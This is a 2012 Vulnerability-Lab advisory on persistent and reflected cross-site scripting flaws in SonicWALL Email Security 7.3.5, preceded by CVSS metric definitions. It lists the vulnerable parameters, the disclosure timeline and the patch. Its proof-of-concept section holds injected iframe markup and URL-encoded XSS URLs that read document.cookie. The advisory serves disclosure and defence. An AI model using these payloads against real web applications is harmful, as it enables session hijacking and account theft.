The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
Low
PR
The attacker requires privileges that provide basic capabilities that are typically limited to settings and resources owned by a single low-privileged user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources.
User Interaction
None
UI
The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
High
C
There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity
High
I
There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability
High
A
There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
Title:
======
SonicWALL EMail Security 7.3.5 - Multiple Vulnerabilities
Date:
=====
2012-08-14
References:
===========
http://www.vulnerability-lab.com/get_content.php?id=543
VL-ID:
=====
543
Common Vulnerability Scoring System:
====================================
3.5
Introduction:
=============
While most businesses now have some type of anti-spam protection, many must deal with cumbersome
management, frustrated users, inflexible solutions, and a higher-than-expected total cost of ownership.
SonicWALL Email Security can help. Elegantly simple to deploy, manage and use, award-winning SonicWALL
Email Security solutions employ a variety of proven and patented technology designed to block spam and
other threats effectively, easily and economically. With innovative protection techniques for both
inbound and outbound email plus unique management tools, the Email Security platform delivers superior
email protection today—while standing ready to stop the new attacks of tomorrow.
SonicWALL Email Security can be flexibly deployed as a SonicWALL Email Security Appliance, as a software
application on a third party Windows server, or as a SonicWALL Email Security Virtual Appliance in a
VMW environment. The SonicWALL Email Security Virtual Appliance provides the same powerful protection as a
traditional SonicWALL Email Security appliance, only in a virtual form, to optimize utilization,
ease migration and reduce capital costs.
(Copy of the Vendor Homepage: http://www.sonicwall.com/us/products/Anti-Spam_Email_Security.html)
Abstract:
=========
Vulnerability Laboratory Research Team discovered multiple Web Vulnerabilities in SonicWalls UTM Email Security
v7.3.5.6379 & Virtual Appliance.
Report-Timeline:
================
2012-05-02: Researcher Notification & Coordination
2012-05-03: Vendor Notification
2012-05-10: Vendor Response/Feedback
2012-08-14: Public or Non-Public Disclosure (90 Days passed)
2012-09-17: Vendor Fix/Patch
Status:
========
Published
Affected Products:
==================
SonicWall
Product: AntiSpam & EMail Security Appliance Application v7.3.5.6379
Exploitation-Technique:
=======================
Remote
Severity:
=========
Medium
Details:
========
1.1
Multiple persistent input validation vulnerabilities are detected in SonicWalls UTM Email Security v7.3.5.6379 &
Virtual Appliance.
The vulnerability allows an remote attacker or local low privileged user account to inject/implement malicious
persistent script
code on application side of the email security appliance application. The vulnerabilities are located on the Compliance
& Virus
protection procedures module when processing to load unsanitized inputs as output listing of a configuration.
Vulnerable values are
floodMsgThreshold, zombieNoOfQuarantine, zombieNoOfMessageFromOneUser, safeModeNoOfQuarantine,
safeModeNoOfMessageFromOneUser,
zombieAllowEmailAddrs & floodMsgThresholdShadow. Successful exploitation of the vulnerability result in session
hijacking,
persistent phishing requests & stable persistent module context manipulation.
Vulnerable Module(s):
[+] Virenschutzverfahren
[-] Ausgehend (Outgoing) - Listing & Exceptions
[+] Compliance Module
[-] Approval Ordner > Add new Approval Folder
1.2
Multiple client side cross site scripting vulnerabilities are detected in SonicWalls UTM Email Security v7.3.5.6379 &
Virtual Appliance.
The vulnerability allows an remote attacker to manipulate client side appliance requests with medium required user
inter action.
Successful exploitation results in sessio hijacking, account steal, client side phishing requests or manipulated
context
exection on client side requests. The vulnerabilities are located on the `from`- & `row` page listing values.
Successful exploitation
of the vulnerability result in client side session hijacking, non-persistent phishing requests & non-persistent module
context manipulation.
Vulnerable Module(s):
[+] Listing Page (?from & ?row)
Proof of Concept:
=================
1.1
The persistent input validation vulnerabilities can be exploited by remote attackers with low privileged user accounts.
For demonstration or reproduce ...
PoC: Ausgehend (Outgoing) - Listing & Exceptions
<input disabled="disabled" id="floodMsgThreshold" name="floodMsgThreshold" value=""
type="hidden"><iframe src="virus_config-Dateien/a.htm" [EXECUTE/INJECT PERSISTENT CODE!]' <"="">
<input type="hidden" id="floodInterval" name="floodInterval"
value="1"/>
... or
<input type="text"
name="zombieNoOfQuarantine" size="3"
value=""><iframe src=a
[EXECUTE/INJECT PERSISTENT CODE!]") <"
id="zombieNoOfQuarantine">
... or
amp;lt;input type="text"
name="zombieNoOfMessageFromOneUser" size="3"
value=""><iframe src=a
[EXECUTE/INJECT PERSISTENT CODE!]") <"
id="zombieNoOfMessageFromOneUser">
... or
<input type="text"
name="safeModeNoOfQuarantine" size="3"
value=""><iframe src=a
[EXECUTE/INJECT PERSISTENT CODE!]") <"
id="safeModeNoOfQuarantine">
... or
<input type="text"
name="safeModeNoOfMessageFromOneUser" size="3"
value=""><iframe src=a
[EXECUTE/INJECT PERSISTENT CODE!]") <"
id="safeModeNoOfMessageFromOneUser">
URL: http://esserver.127.0.0.1:8080/virus_config.html
PoC: Compliance Module -> Approval Ordner - Listing & Exceptions
<tbody><tr><td background="policy_approval_box_summary-Dateien/nav_bar_background.gif" width="24">
<img src="policy_approval_box_summary-Dateien/clear.gif" height="15" width="4"></td><td border="0"
background="policy_approval_box_summary-Dateien/nav_bar_background.gif"><span class="column">Approval-
Ordner</span></td><td border="0" background="policy_approval_box_summary-Dateien/nav_bar_background.gif">
<span class="column">Nachrichten, die eine Genehmigung erfordern</span></td><td background="policy_approval_box_
summary-Dateien/nav_bar_background.gif"> </td></tr><tr>
<td height="12"> </td>
<td><a href="http://esserver.demo.sonicwall.com/policy_approval_box.html
?pathname=[INJECTED PERSISTENT CODE!]"><iframe src="policy_approval_box_
summary-Dateien/a.htm" [EXECUTION OF PERSISTENT CODE!]" <<="" a=""></td>
<td>0</td>
<td><div
align="right"><input type="button" name="delete" class="button"
value="Lschen"
URL: http://esserver.127.0.0.1:8080/policy_approval_box_summary.html
1.2
The client side cross site scripting vulnerability can be exploited by remote attackers with medium required user inter
action.
For demonstration or reproduce ...
PoC:
http://esserver.127.0.0.1:8080/alert_history.html?from=200<%253ciframe%2520src%3Da%2520onload%3Dalert%28document.cookie%29%2520%253c
http://esserver.127.0.0.1:8080/alert_history.html[POST
REQUEST]row=200<%253ciframe%2520src%3Da%2520onload%3Dalert%28document.cookie%29%2520%253c
http://esserver.127.0.0.1:8080/policy_approval_box.html?pathname=%253ciframe%2520src%3Da%2520onload%3Dalert%28document.cookie%29%2520%253c
Solution:
=========
The Email Security 7.3.6 patch that addresses this set of issues has now been posted and is available to all of our
Email Security customers
from the download section of our customer portal (https://www.mysonicwall.com/Firmware/DownloadCenter.aspx).
Risk:
=====
1.1
The security risk of the persistent input validation vulnerabilities are estimated as high(-).
1.2
The security risk of the client side cross site scripting vulnerabilities are estimated as low(+).
Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm () vulnerability-lab com)
Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all
warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose.
Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss
of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such
damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing
limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack
into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com -
www.vulnerability-lab.com/register
Contact: admin () vulnerability-lab com - support () vulnerability-lab com - research ()
vulnerability-lab com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com -
news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab -
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php -
vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability
Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the
use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode,
videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record,
list (feed),
modify, use or edit our material contact (admin () vulnerability-lab com or support () vulnerability-lab com) to get a
permission.
Copyright 2012 | Vulnerability Laboratory